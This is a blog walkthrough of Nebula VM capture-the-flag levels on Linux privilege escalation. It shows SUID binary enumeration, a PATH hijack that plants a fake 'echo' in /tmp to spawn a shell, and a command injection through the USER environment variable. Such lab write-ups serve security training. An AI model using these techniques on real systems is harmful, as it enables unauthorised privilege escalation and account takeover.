Day 29: Set User ID & Environment Variable Injection (PATH & USER) for Linux Priv. Esc.

Atumcell Labs
2 min readJan 28, 2019

To follow along, get the Nebula VM from Exploit Education…

Level 00 (Set User ID)

Finding the files and ignoring errors…

find / -perm /4000 2>/dev/null

A lot of these are common linux files that are Set User ID so over time you get to know them and ignore them, unless your in a CTF that is trolling you and the issue is in a common bin, so always check anyway if it’s at a dead end or an old version that has known vulnerabilities.

Of course “/bin/…/flag00” is seriously suspect, so we try this…

level00@nebula:~$ /bin/.../flag00
Congrats, now run getflag to get your flag!
flag00@nebula:~$ getflag
You have successfully executed getflag on a target account

It really was that easy but do not underestimate the power of Set User ID, it has allowed me to priv. esc. more times than I can recall, it’s powerfull, it’s common, use it! Always check permissions!

Search for SUID/GUID binaries

find / -perm -g=s -o -perm -4000 ! -type l -maxdepth 6 -exec ls -ld {} \; 2>/dev/nullfind / -perm -1000 -type d 2>/dev/nullfind / -perm -g=s -type f 2>/dev/null

Level 01 (Environment Variable Injection — PATH)

Challenge source is provided, can we spot the vulnerability?

We know we can alter environment variables and that the program will do the following:

setresuid() which sets the real user ID, the effective user ID, and the saved set-user-ID of the calling process and setresgid() which sets the real GID, effective GID, and saved set-group-ID of the calling process.

With the source code, and access to the server, it’s easy to spot the issue:

-rwsr-x--- 1 flag01 level01 7322 2011-11-20 21:22 flag01

If we can change our executable $PATH to first check /tmp a place we know we can write to, then we can put our own ‘echo’ binary there which will allow us to call a system process as flag01. Out echo program will simply spawn a new shell.

nano /tmp/echo.c
cc /tmp/echo.c -o /tmp/echo
export PATH=/tmp/:$PATH
cd /home/flag01
./flag01
getflag

Level 02 (Environment Variable Injection — USER)

We get the source again for this..

This one is easy, we can just inject a command into the USER environment variable.

cd /home/flag02
USER=";/bin/sh;"
./flag02
getflag

The 2x semi-colons in the “/bin/sh” command injection are important as bash needs that to separate the commands otherwise it will look for “echo /bin/sh is cool” which of course is junk for us.

Sign up to discover human stories that deepen your understanding of the world.

Membership

Read member-only stories

Support writers you read most

Earn money for your writing

Listen to audio narrations

Read offline with the Medium app

Atumcell Labs
Atumcell Labs

Written by Atumcell Labs

Security Research Team @ Atumcell

No responses yet

Write a response